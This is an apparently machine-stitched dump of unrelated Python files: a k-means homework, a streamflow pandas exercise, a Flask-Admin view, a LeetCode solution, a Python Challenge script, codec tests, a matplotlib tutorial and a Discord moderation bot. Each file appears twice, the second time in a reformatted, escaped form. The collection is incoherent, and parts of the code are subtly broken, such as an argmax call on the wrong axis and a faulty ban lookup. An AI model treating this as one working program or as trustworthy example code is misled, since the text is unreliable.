# Project Overview
# Implement the k-means algorithm and apply your implementation on the given dataset,
# which contains a set of 2-D points.
# Import Libraries
import scipy.io
import pandas as pd
import matplotlib.pyplot as plt
import random
import numpy as np
import time
print("\nProgram Started :",time.asctime())
# Function to assign data to clusters using minimum euclidean distance to centroids.
# Input: Data and Centroids (uses the globals m and K defined below)
# Output: Assigned Clusters
def assign(data,Centroids):
EuclideanDistance = np.array([]).reshape(m, 0)
for k in range(K):
dist = np.sum((data - Centroids[:, k]) ** 2, axis=1)
EuclideanDistance = np.c_[EuclideanDistance, dist]
Clusters = np.argmin(EuclideanDistance, axis=1) + 1
return(Clusters)
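# A minimal vectorized sketch (hypothetical helper, not used below): the same
# assignment computed with NumPy broadcasting instead of the per-centroid loop;
# shapes assume data is (m, n) and Centroids is (n, K), as in assign() above.
def assign_vectorized(data, Centroids):
    diffs = np.asarray(data)[:, None, :] - Centroids.T[None, :, :]  # (m, K, n)
    return np.argmin(np.sum(diffs ** 2, axis=2), axis=1) + 1        # labels 1..K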
# Function to map clusters and the respective data points
# Input: data and number of clusters
# Output: Map Cluster to Data Points
def map_cluster_data(data, K):
clusterDataMap = {}
for k in range(K):
clusterDataMap[k + 1] = np.array([]).reshape(2, 0)
for i in range(m):
clusterDataMap[clusters[i]] = np.c_[clusterDataMap[clusters[i]], data.iloc[i]]
for k in range(K):
clusterDataMap[k + 1] = clusterDataMap[k + 1].T
return(clusterDataMap)
# Function to calculate centroid
# Input: Map with cluster and Data Points and Centroids
# Output: New centroids which are calculated from the data mapping of clusters
def centroid(clusterDataMap,Centroids):
for k in range(K):
Centroids[:, k] = np.mean(clusterDataMap[k + 1], axis=0)
return(Centroids)
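# In symbols, the update above is mu_k = (1/|C_k|) * sum of the points assigned
# to cluster k, i.e. each new centroid is the component-wise mean of its cluster.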
# Strategy 1 - Cluster Initialization
# Function to initialize cluster centroids randomly
# Input: Data and Number of Clusters
# Output: Centroids
def initialize_centroids(data, K):
Centroids = np.array([]).reshape(data.shape[1], 0)
for i in range(K):
randIndex = random.randint(0, data.shape[0] - 1)
Centroids = np.c_[Centroids, data.iloc[randIndex]]
return(Centroids)
# Strategy 2 - Cluster Initialization
# Function to initialize cluster centroids: the first centroid is picked randomly,
# and each later centroid is the sample farthest from the mean of the centroids
# chosen so far
# Input: Data and Number of Clusters
# Output: Centroids
def initialize_centroids_strategy2(data, K):
Centroids = np.array([]).reshape(data.shape[1], 0)
for i in range(K):
        if i == 0:
            rand = random.randint(0, data.shape[0] - 1)
            Centroids = np.c_[Centroids, data.iloc[rand]]
            data = data.drop(data.index[rand])
else:
            centroidMean = np.mean(Centroids, axis=1)
            # np.sum(..., axis=1) already yields a 1-D distance vector, so
            # argmax takes no axis argument here
            index = int(np.argmax(np.sqrt(np.sum((data - centroidMean) ** 2, axis=1))))
            Centroids = np.c_[Centroids, data.iloc[index]]
            data = data.drop(data.index[index])
return(Centroids)
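# A sketch of the selection rule as the assignment states it (maximize the
# *average* distance to all previously chosen centers); the function above
# approximates this with the distance to the mean of the chosen centers.
# `farthest_by_average_distance` is a hypothetical helper, not called below.
def farthest_by_average_distance(data, Centroids):
    pts = np.asarray(data)[:, None, :]                        # (m, 1, n)
    ctr = Centroids.T[None, :, :]                             # (1, c, n)
    avg_dist = np.sqrt(((pts - ctr) ** 2).sum(axis=2)).mean(axis=1)
    return int(np.argmax(avg_dist))                           # positional index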
# Read Data
Numpyfile= scipy.io.loadmat("C:\\Projects\\MCS\\CSE575\\Project 2 - KMeans\\data.mat")
data = pd.DataFrame(Numpyfile['AllSamples'])
data.columns=['x1','x2']
m = data.shape[0]
n = data.shape[1]
# Initialize Parameters
n_iter = 50
# Initialize plot parameters
color=['red','blue','green','cyan','magenta','grey', 'yellow', 'orange', 'black', 'purple']
labels=['cluster1','cluster2','cluster3','cluster4','cluster5','cluster6', 'cluster7','cluster8','cluster9','cluster10']
#
print("Strategy 1 : First Iteration")
# ********* Strategy 1 ************
# Randomly pick the initial centers from the given samples.
# First run with cluster initiation
# Run K-Means with clusters in the range of 2 - 10
WCSS_array=np.array([])
for K in range(2,11):
Centroids = initialize_centroids(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
    # Compute the objective function: WCSS = sum_k sum_{x in C_k} ||x - mu_k||^2
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
# Plot the objective function
KMeans_array=np.arange(2,11,1)
plt.figure()
plt.plot(KMeans_array,WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy1 - Run 1: Elbow Chart to identify optimum cluster number')
plt.show()
print("Strategy 1 : Second Iteration")
# Second run with different cluster initiation
# Run K-Means with clusters in the range of 2 - 10
WCSS_array=np.array([])
for K in range(2,11):
Centroids = initialize_centroids(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
    # Compute the objective function: WCSS = sum_k sum_{x in C_k} ||x - mu_k||^2
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
# Plot the objective function
KMeans_array=np.arange(2,11,1)
plt.figure()
plt.plot(KMeans_array,WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy1 - Run 2: Elbow Chart to identify optimum cluster number')
plt.show()
print("Strategy 2 : First Iteration")
# ********** Strategy 2 ************
# Strategy 2: pick the first center randomly; for the i-th center (i>1),
# choose a sample (among all possible samples) such that the average distance of this
# chosen one to all previous (i-1) centers is maximal.
# First run with cluster initiation
# Run K-Means with clusters in the range of 2 - 10
WCSS_array=np.array([])
for K in range(2,11):
Centroids = initialize_centroids_strategy2(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
# Plot the objective function: Strategy 2 - First initialization
KMeans_array=np.arange(2,11,1)
plt.figure()
plt.plot(KMeans_array,WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy2 - Run 1: Elbow Chart to identify optimum cluster number')
plt.show()
print("Strategy 2 : Second Iteration")
# Second run with different cluster initiation
# Run K-Means with clusters in the range of 2 - 10
WCSS_array=np.array([])
for K in range(2,11):
Centroids = initialize_centroids_strategy2(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
# Plot the objective function: Strategy 2 - Second initialization
KMeans_array=np.arange(2,11,1)
plt.figure()
plt.plot(KMeans_array,WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy2 - Run 2: Elbow Chart to identify optimum cluster number')
plt.show()
print("\nProgram Ended :",time.asctime())
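# Reproducibility note (a sketch, not required by the assignment): the two runs
# per strategy differ only because random.randint draws fresh values each time;
# calling, e.g., random.seed(42) before a run would make it repeatable.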
# Example solution for HW 5
# %%
# Import the modules we will use
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# %%
# ** MODIFY **
# Set the file name and path to where you have stored the data
filename = 'streamflow_week5.txt' #modified filename
filepath = os.path.join('../data', filename) #modified path to look one directory up
print(os.getcwd())
print(filepath)
#filepath = '../Assignments/Solutions/data/streamflow_week5.txt'
# %%
#Read the data into a pandas dataframe
data=pd.read_table(filepath, sep = '\t', skiprows=30,
names=['agency_cd', 'site_no', 'datetime', 'flow', 'code']
)
# Expand the dates to year month day
data[["year", "month", "day"]] =data["datetime"].str.split("-", expand=True)
data['year'] = data['year'].astype(int)
data['month'] = data['month'].astype(int)
data['day'] = data['day'].astype(int)
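# An equivalent sketch using pandas' datetime accessor instead of string splitting
# (assumes the datetime column parses cleanly):
#   dt = pd.to_datetime(data['datetime'])
#   data['year'], data['month'], data['day'] = dt.dt.year, dt.dt.month, dt.dt.day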
# %%
# Sorry no more helpers past here this week, you are on your own now :)
# Hints - you will need the functions: describe, info, groupby, sort, head and tail.
# %% Start of Mekha's code
# 1 and 2 week forecast
# Look at most recent 2 weeks of data ending 9/26
print(data.tail(14))
# Calculate avg of last two week's flow
print(data.tail(14).describe())
# Calculate avg of last week's flow
print(data.tail(7).describe())
# Look at stats for 2019 because, from my previous analysis, I know it is a similarly dry year
data_2019 = data[data['year']==2019]
print(data_2019['flow'].describe())
# Look at stats for 2019 by month
print(data_2019.groupby(['month'])[['flow']].describe())
# %% 1. Provide a summary of the data frames properties.
# What are the column names?
# What is its index?
# What data types do each of the columns have?
print(data.info())
# %% 2.Provide a summary of the flow column including the min, mean, max, standard
# deviation and quartiles.
print(data['flow'].describe())
# %% 3.Provide the same information but on a monthly basis. (Note: you should be
# able to do this with one or two lines of code)
print(data.groupby(['month'])[['flow']].describe())
# %% 4.Provide a table with the 5 highest and 5 lowest flow values for the period
# of record. Include the date, month and flow values in your summary.
# 5 highest
print(data.sort_values(by="flow",ascending=True).tail())
# 5 lowest
print(data.sort_values(by="flow",ascending=True).head())
# %% 5.Find the highest and lowest flow values for every month of the year (i.e. you
# will find 12 maxes and 12 mins) and report back what year these occurred in.
# highest value for each month
for i in range(1,13):
month_data = data[data['month']==i]
print(month_data.nlargest(1,['flow']))
# lowest value for each month
for i in range(1,13):
month_data = data[data['month']==i]
print(month_data.nsmallest(1,['flow']))
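# A vectorized sketch of the same monthly extremes using groupby with idxmax/idxmin:
#   data.loc[data.groupby('month')['flow'].idxmax()]   # one max row per month
#   data.loc[data.groupby('month')['flow'].idxmin()]   # one min row per month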
# %% 6.Provide a list of historical dates with flows that are within 10% of your week 1
# forecast value. If there are none, then increase the 10% window until you have at
# least one other value, and report the date and the new window you used
forecast = 58.4
data_10percent = data[(data['flow'] >= (0.9*forecast)) & (data['flow'] <= (1.1*forecast))]
pd.set_option('display.max_rows', None)
print(data_10percent['datetime'])
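# A sketch of the widening rule described above, in case the 10% window were empty:
#   pct = 0.10
#   while data[(data['flow'] >= (1 - pct) * forecast) & (data['flow'] <= (1 + pct) * forecast)].empty:
#       pct += 0.05   # widen in 5% steps and report the window actually used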
# %%
from flask_admin.contrib.sqla import ModelView
from flask_admin import Admin
from flask import abort
import flask_login
import logging
from .models import User, sendUserMail, db as userdb
from .box_models import Box, Image, db as boxdb
from .box_queue import BoxQueue
logger = logging.getLogger('labboxmain')
# Base ModelView: only administrators (groupid == 0) may access the admin pages
class AuthModel(ModelView):
def is_accessible(self):
if not flask_login.current_user.is_authenticated:
abort(400, "Permission Denied")
return False
now_user = flask_login.current_user
if now_user.groupid != 0:
abort(400, "Permission Denied")
return False
logger.warning('[Admin] ' + now_user.name)
return True
class UserModel(AuthModel):
    column_list = ["id", "name", "disable", "groupid", "email", "passtime", "quota", "use_quota", "password"]

    column_descriptions = {
        'password': "Password (leave empty for a forgotten or newly created account; an email will be sent to the user)",
        'passtime': "The time the password was last changed manually (0 = never)"
    }

    def on_model_change(self, form, model, is_created):
        # Newly created user: mail a registration link instead of storing a password
        if is_created:
            logger.warning("[Admin] Create for " + model.email)
            sendUserMail(model, "register")
            return
        # Password field left empty: treat it as a reset request and mail the user
        if not model.password:
            logger.warning("[Admin] Reset Password and sent to " + model.email)
            sendUserMail(model, "forgetpass")
            return
        # Values without the "$6$" SHA-512 crypt prefix are plaintext: hash and store them
        if not model.password.startswith("$6$"):
            logger.warning("[Admin] Reset Password " + model.email)
            model.setPassword(model.password)
admin = Admin()
admin.add_view(AuthModel(Box, boxdb.session))
admin.add_view(AuthModel(Image, boxdb.session))
admin.add_view(UserModel(User, userdb.session))
admin.add_view(AuthModel(BoxQueue, boxdb.session))
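
# A minimal wiring sketch (the Flask app below is an assumption, not part of
# this module): an Admin instance created without an app is attached later
# with init_app(), which exposes the views registered above under /admin.
#
#   from flask import Flask
#   app = Flask(__name__)
#   admin.init_app(app)
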
from typing import List


class Solution:
    def asteroidCollision(self, asteroids: List[int]) -> List[int]:
        # The output list acts as a stack of surviving asteroids.
        output = []
        for i in asteroids:
            if not output:
                output.append(i)
                continue
            if i >= 0 or output[-1] < 0:
                # No collision: the new asteroid moves right, or the top of
                # the stack moves left, so the two never meet.
                output.append(i)
                continue
            # The new asteroid moves left into right-moving survivors.
            append = True
            while output:
                if output[-1] < 0:
                    break  # everything left on the stack moves left: safe
                elif abs(output[-1]) == abs(i):
                    del output[-1]  # equal sizes: both explode
                    append = False
                    break
                elif abs(output[-1]) < abs(i):
                    del output[-1]  # smaller stacked asteroid explodes; keep checking
                else:
                    append = False  # the new asteroid explodes
                    break
            if append:
                output.append(i)
        return output
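
# A quick sanity check outside the LeetCode harness (illustrative values:
# positive asteroids move right, negative ones move left):
if __name__ == '__main__':
    s = Solution()
    print(s.asteroidCollision([5, 10, -5]))   # [5, 10]: the -5 explodes
    print(s.asteroidCollision([8, -8]))       # []: both explode
    print(s.asteroidCollision([10, 2, -5]))   # [10]: -5 destroys the 2, then explodes
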
import zipfile, re

# Python Challenge "channel" puzzle: each text member of the archive names
# the next one ("Next nothing is N"); follow the chain and collect each
# member's zip comment along the way.
f = zipfile.ZipFile("channel.zip")
num = '90052'
comments = []

while True:
    content = f.read(num + ".txt").decode("utf-8")
    print(content)
    comments.append(f.getinfo(num + ".txt").comment.decode("utf-8"))
    match = re.search(r"Next nothing is (\d+)", content)
    if match is None:
        break
    num = match.group(1)

# The collected comments join into a large ASCII-art message
print("".join(comments))

url = "http://www.pythonchallenge.com/pc/def/hockey.html"
print(url)
# look at the letters that make the ascii art: O makes h, x makes o,
# g makes k, e makes e, n makes y
print("http://www.pythonchallenge.com/pc/def/oxygen.html")
# -*- coding: utf-8 -*-
"""Very basic codec tests.
:copyright: the translitcodec authors and developers, see AUTHORS.
:license: MIT, see LICENSE for more details.
"""
import codecs
import translitcodec
data = u'£ ☹ wøóf méåw'
def test_default():
assert codecs.encode(data, 'transliterate') == u'GBP :-( woof meaaw'
def test_translit_long():
assert codecs.encode(data, 'translit/long') == u'GBP :-( woof meaaw'
def test_translit_short():
assert codecs.encode(data, 'translit/short') == u'GBP :-( woof meaw'
def test_translit_one():
assert codecs.encode(data, 'translit/one') == u'\u00a3 \u2639 woof meaw'
def test_translit_long_ascii():
    assert data.encode('translit/long/ascii') == b'GBP :-( woof meaaw'
def test_translit_short_ascii():
    assert data.encode('translit/short/ascii') == b'GBP :-( woof meaw'
def test_translit_one_ascii():
try:
codecs.encode(data, 'translit/one/ascii')
assert False
except UnicodeEncodeError:
assert True
assert codecs.encode(data, 'translit/one/ascii', 'replace') == b'? ? woof meaw'
def test_ascii_level_characters_remain():
assert codecs.encode(u"'", 'translit/long') == u"'"
def test_zero_width_space():
try:
char = codecs.encode(u'\u200b', 'translit/long')
assert char == u''
except TypeError:
assert False
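
# These are plain pytest-style functions that pytest would normally discover.
# A minimal stand-in runner (an assumption, not part of the original suite)
# so the module can also be executed directly:
if __name__ == '__main__':
    for name, fn in sorted(globals().items()):
        if name.startswith('test_') and callable(fn):
            fn()
    print('ok')
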
import numpy as np
import matplotlib.pyplot as plt

##########################################
# line plot
#########################################

# If the x values are omitted, the x axis defaults to 0, 1, 2, 3
"""
plt.plot([1, 4, 9, 16])
plt.show()
"""

# Specifying both the x and y values
"""
plt.plot([10, 20, 30, 40], [1, 4, 9, 16])
plt.show()
"""

# Style specification
# Given in the order: color, marker, line
# Colors: blue(b), green(g), red(r), cyan(c), magenta(m), yellow(y), black(k), white(w)
# Markers: point(.), pixel(,), circle(o), triangle_down(v), triangle_up(^),
#          triangle_left(<), triangle_right(>), tri_down(1), tri_up(2), tri_left(3),
#          tri_right(4), square(s), pentagon(p), star(*), hexagon1(h),
#          hexagon2(H), plus(+), x marker(x), diamond(D), thin_diamond(d)
# Lines: solid line(-), dashed line(--), dash-dot line(-.), dotted(:)
"""
plt.plot([1,4,9,16], 'bs:')
plt.show()
"""

# Other style options
# See http://matplotlib.org/1.5.1/api/lines_api.html#matplotlib.lines.Line2D
# color(c): line color
# linewidth(lw): line width
# linestyle(ls): line style
# marker: marker type
# markersize(ms): marker size
# markeredgecolor(mec): marker edge color
# markeredgewidth(mew): marker edge width
# markerfacecolor(mfc): marker face color
"""
plt.plot([1,4,9,16], c="b", lw=5, ls="--", marker="o", ms=15, mec="g", mew=5,
         mfc="r")
plt.show()
"""

# Setting the plot range
# xlim and ylim take the minimum and maximum values
"""
plt.plot([1,4,9,16], c="b", lw=5, ls="--", marker="o", ms=15, mec="g", mew=5,
         mfc="r")
plt.xlim(-10, 10)
plt.ylim(-10, 30)
plt.show()
"""

# Tick settings
# Tick: a marked position on an axis of a plot or chart
# Tick label: the number or text drawn at a tick
# Tick labels are set with xticks and yticks
# A tick label string may contain a LaTeX math expression between $ signs
"""
X = np.linspace(-np.pi, np.pi, 256)
C = np.cos(X)
plt.plot(X, C)
plt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi])
plt.yticks([-1, 0, +1])
plt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi], [r'$-\pi$', r'$-\pi/2$',
           '0', r'$+\pi/2$', r'$+\pi$'])
plt.yticks([-1, 0, +1], ["Low", "Zero", "High"])
plt.grid(False)  # remove the grid
plt.show()
"""

# Drawing several lines
# Pass several x, y, style groups in a single call
"""
t = np.arange(0., 5., 0.2)
plt.plot(t, t, 'r--', t, 0.5*t**2, 'bs:', t, 0.2*t**3, 'g^-')
plt.show()
"""

# Overlaying multiple plot commands on one figure: hold
# hold(True): start overlaying
# hold(False): stop overlaying
"""
plt.plot([1,4,9,16], c="b", lw=5, ls="--", marker="o", ms=15, mec="g", mew=5,
         mfc="r")
plt.hold(True)
plt.plot([9,16,4,1], c="k", lw=3, ls=":", marker="s", ms=10, mec="m", mew=5,
         mfc="c")
plt.hold(False)
plt.show()
"""
# Legend
# The legend command adds a legend
# The loc argument sets the legend position
# loc: best(0), upper right(1), upper left(2), lower left(3),
#      lower right(4), right(5), center left(6), center right(7),
#      lower center(8), upper center(9), center(10)
"""
X = np.linspace(-np.pi, np.pi, 256)
C, S = np.cos(X), np.sin(X)
plt.plot(X, C, label="cosine")
plt.hold(True)
plt.plot(X, S, label="sine")
plt.legend(loc=5)
plt.show()
"""

# x-axis label, y-axis label and title
# Set with xlabel, ylabel and title
"""
X = np.linspace(-np.pi, np.pi, 256)
C, S = np.cos(X), np.sin(X)
plt.plot(X, C, label="cosine")
plt.xlabel("time")
plt.ylabel("amplitude")
plt.title("Cosine Plot")
plt.show()
"""

# Annotations
# The annotate command places extra explanations, including arrows, inside the plot
"""
X = np.linspace(-np.pi, np.pi, 256)
S = np.sin(X)
plt.plot(X, S, label="sine")
plt.scatter([0], [0], color="r", linewidth=10)
plt.annotate(r'$(0,0)$', xy=(0, 0), xycoords='data', xytext=(-50, 50),
             textcoords='offset points', fontsize=16,
             arrowprops=dict(arrowstyle="->", linewidth=3, color="g"))
plt.show()
"""

# The object hierarchy is Figure [ Axes [ Axis ] ]
# Figure: used when opening several windows or when setting the figure size
# plot creates a Figure automatically, so there is usually no need to create
# one explicitly
# Use the gcf command to get the current Figure object
"""
f1 = plt.figure(figsize=(100,2))
plt.plot(np.random.randn(100))
plt.show()
"""
"""
f1 = plt.figure(1)
plt.plot([1,2,3,4], 'ro:')
f2 = plt.gcf()
print(f1, id(f1))
print(f2, id(f2))
plt.show()
"""

# Axes and Subplot
# When several plots are arranged inside one window (Figure), each plot
# belongs to an object called an Axes
# The subplot command creates Axes objects; plot creates one automatically
# when needed
# subplot lays the Axes objects out on a grid
# Think of the Figure as a matrix and each Axes as one of its elements:
# two plots stacked top and bottom form a 2x1 matrix
# subplot takes three arguments: the first two define the matrix and the
# third selects the position
"""
x1 = np.linspace(0.0, 5.0)
x2 = np.linspace(0.0, 2.0)
y1 = np.cos(2 * np.pi * x1) * np.exp(-x1)
y2 = np.cos(2 * np.pi * x2)

ax1 = plt.subplot(2, 1, 1)
plt.plot(x1, y1, 'yo-')
plt.title('A tale of 2 subplots')
plt.ylabel('Damped oscillation')
print(ax1)

ax2 = plt.subplot(2, 1, 2)
plt.plot(x2, y2, 'r.-')
plt.xlabel('time (s)')
plt.ylabel('Undamped')
print(ax2)

plt.show()
"""

# The subplot arguments (2,2,1) can be abbreviated to 221
"""
plt.subplot(221); plt.plot([1,2]); plt.title(1)
plt.subplot(222); plt.plot([1,2]); plt.title(2)
plt.subplot(223); plt.plot([1,2]); plt.title(3)
plt.subplot(224); plt.plot([1,2]); plt.title(4)
plt.tight_layout()
plt.show()
"""
# xkcd style
X = np.linspace(-3, 3, 4096)
C = np.cos(X)

with plt.xkcd():
    plt.title('XKCD style plot!!!')
    plt.plot(X, C, label="cosine")
    t = 2 * np.pi / 3
    plt.scatter(t, np.cos(t), 50, color='blue')
    plt.annotate(r'0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-90,
                 -50), textcoords='offset points', fontsize=16,
                 arrowprops=dict(arrowstyle="->", linewidth=3, color="g"))
plt.show()
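
# plt.xkcd() is a context manager: it temporarily swaps in the hand-drawn
# rcParams and restores the default style when the with-block exits, e.g.:
"""
with plt.xkcd():
    plt.plot([1, 2, 3])  # sketchy hand-drawn look
plt.plot([1, 2, 3])      # default style again
plt.show()
"""
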
import discord
from discord.ext import commands
import datetime
from discord.utils import get
from discord import User
class Sinner(commands.Converter):
    """Converter that resolves a Member and rejects staff (manage_messages) targets."""

    async def convert(self, ctx, argument):
        argument = await commands.MemberConverter().convert(ctx, argument)
        permission = argument.guild_permissions.manage_messages
        if not permission:
            return argument
        else:
            raise commands.BadArgument("You cannot punish other staff members")


class Redeemed(commands.Converter):
    """Converter that resolves a Member and requires them to currently be muted."""

    async def convert(self, ctx, argument):
        argument = await commands.MemberConverter().convert(ctx, argument)
        muted = discord.utils.get(ctx.guild.roles, name="Muted")
        if muted in argument.roles:
            return argument
        else:
            raise commands.BadArgument("The user was not muted.")
async def mute(ctx, user, reason="No reason"):
    # Reuse the guild's "Muted" role; create it (plus the channel overrides
    # that silence it everywhere) on first use.
    role = discord.utils.get(ctx.guild.roles, name="Muted")
    if not role:
        try:
            muted = await ctx.guild.create_role(name="Muted", reason="To use for muting")
            for channel in ctx.guild.channels:
                await channel.set_permissions(muted, send_messages=False,
                                              read_message_history=False,
                                              read_messages=False)
        except discord.Forbidden:
            return await ctx.send("I have no permissions to make a muted role")
        await user.add_roles(muted)
        await ctx.send(f"{user.mention} has been muted for {reason}")
    else:
        await user.add_roles(role)
        await ctx.send(f"{user.mention} has been muted for {reason}")
    # Announce the mute in a fixed log channel (hardcoded channel ID)
    channel = ctx.bot.get_channel(718865797006753892)
    await channel.send(f"{user.mention}, welcome to the bad kids club.")
class Moderation(commands.Cog):
"""Moderation Commands"""
def __init__(self, bot):
self.bot = bot
@commands.command(name="ban")
@commands.has_permissions(ban_members=True)
async def ban(self, ctx, member: discord.Member, *, reason="No reason"):
"""Bans someone"""
        if member is None or member == ctx.message.author:
            await ctx.send("You cannot ban yourself!")
            return
        try:
            # member is already a resolved Member object, so ban it directly
            await member.ban(reason=reason)
except discord.Forbidden:
await ctx.send(f"It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.")
else:
embed = discord.Embed(title=f"`{ctx.author}` banned {member}", colour=member.color, timestamp=datetime.datetime.utcnow())
embed.add_field(name="● Details:", value=f" - Reason: {reason}")
embed.set_footer(icon_url=f"{ctx.author.avatar_url}", text=f"{ctx.author.top_role.name} ")
await ctx.send(embed=embed)
print(ctx.author.name, 'used the command ban')
@commands.command()
@commands.has_permissions(ban_members=True)
async def unban(self, ctx, member, *, reason="No reason"):
print("unbanned")
        if member is None or member == ctx.message.author:
await ctx.send("You cannot unban yourself!")
return
try:
member = await self.bot.fetch_user(int(member))
await ctx.guild.unban(member, reason=reason)
except discord.Forbidden:
await ctx.send(f"It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.")
else:
await ctx.send(f"`{member}` was unbanned by **{ctx.author.name}**.")
print(ctx.author.name, 'used the command unban')
@commands.command(name="kick")
@commands.has_permissions(kick_members=True)
async def kick(self, ctx, member: discord.Member, *, reason="No reason"):
"""Kicks someone"""
        if member is None or member == ctx.message.author:
await ctx.send("You cannot kick yourself!")
return
try:
await member.kick(reason=reason)
except discord.Forbidden:
await ctx.send(f"It looks like i dont have the permission `KICK_MEMBERS` to do this. Please check my permissions and try running the command again.")
else:
embed = discord.Embed(title=f"`{ctx.author}` kicked {member}", colour=member.color, timestamp=datetime.datetime.utcnow())
embed.add_field(name="● Details:", value=f" - Reason: {reason}")
embed.set_footer(icon_url=f"{ctx.author.avatar_url}", text=f"{ctx.author.top_role.name} ")
await ctx.send(embed=embed)
print(ctx.author.name, 'used the command kick')
@commands.command(name="clear")
@commands.has_permissions(manage_messages=True)
async def clear(self, ctx, amount: int):
"""Clears messages."""
channel = ctx.channel
try:
            await channel.purge(limit=amount + 1)  # +1 also removes the invoking command message
except discord.Forbidden:
await ctx.send(f"It looks like i dont have the permission `MANAGE_MESSAGES` to do this. Please check my permissions and try running the command again.")
else:
await ctx.send(f"{amount} messages deleted.")
@clear.error
async def clear_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send("You need to specify an amount of messages, i can't purge air...")
if isinstance(error, commands.BadArgument):
await ctx.send("Give me a valid number.")
if isinstance(error, commands.CheckFailure):
await ctx.send(f"{ctx.author.name}, you don't have permission to use this command.")
raise error
@kick.error
async def kick_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send("You need to tell me who to kick.")
if isinstance(error, commands.BadArgument):
await ctx.send("Is that a person?")
if isinstance(error, commands.CheckFailure):
await ctx.send(f"{ctx.author.name}, you don't have permission to use this command.")
raise error
@ban.error
async def ban_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send("You need to tell me who to ban.")
if isinstance(error, commands.BadArgument):
await ctx.send("Is that a person?.")
if isinstance(error, commands.CheckFailure):
await ctx.send(f"{ctx.author.name}, you don't have permission to use this command.")
raise error
@commands.command()
async def mute(self, ctx, user: Sinner, reason=None):
"""Mutes a user."""
        if user is None or user == ctx.message.author:
await ctx.send("You cannot mute yourself!")
return
await mute(ctx, user, reason or "treason")
@commands.command()
async def unmute(self, ctx, user: Redeemed):
"""Unmutes a muted user"""
        if user is None or user == ctx.message.author:
await ctx.send("You cannot unmute yourself!")
return
await user.remove_roles(discord.utils.get(ctx.guild.roles, name="Muted"))
await ctx.send(f"{user.mention} has been unmuted")
@mute.error
async def mute_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send("You need to tell me who do you want to mute.")
if isinstance(error, commands.BadArgument):
await ctx.send("Is that a person?")
if isinstance(error, commands.CheckFailure):
await ctx.send(f"{ctx.author.name}, you don't have permissions to use this command.")
@unmute.error
async def unmute_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send("You need to tell me who do you want to unmute.")
if isinstance(error, commands.BadArgument):
await ctx.send("Is that a person?")
if isinstance(error, commands.CheckFailure):
await ctx.send(f"{ctx.author.name}, you don't have permissions to use this command.")
@unban.error
async def unban_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send("You need to tell me who do you want to unban.")
if isinstance(error, commands.BadArgument):
await ctx.send("Is that a person?")
if isinstance(error, commands.CheckFailure):
await ctx.send(f"{ctx.author.name}, you don't have permissions to use this command.")
def setup(bot):
bot.add_cog(Moderation(bot))
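
# A minimal loading sketch (assumptions: this cog lives in moderation.py and
# TOKEN is your bot token; discord.py 2.x additionally requires intents and
# an awaited load_extension):
#
#   bot = commands.Bot(command_prefix='!')
#   bot.load_extension('moderation')
#   bot.run('TOKEN')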
commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to mute.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n @unmute.error\n async def unmute_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to unmute.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n @unban.error\n async def unban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to unban.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n\ndef setup(bot):\n bot.add_cog(Moderation(bot))\n",
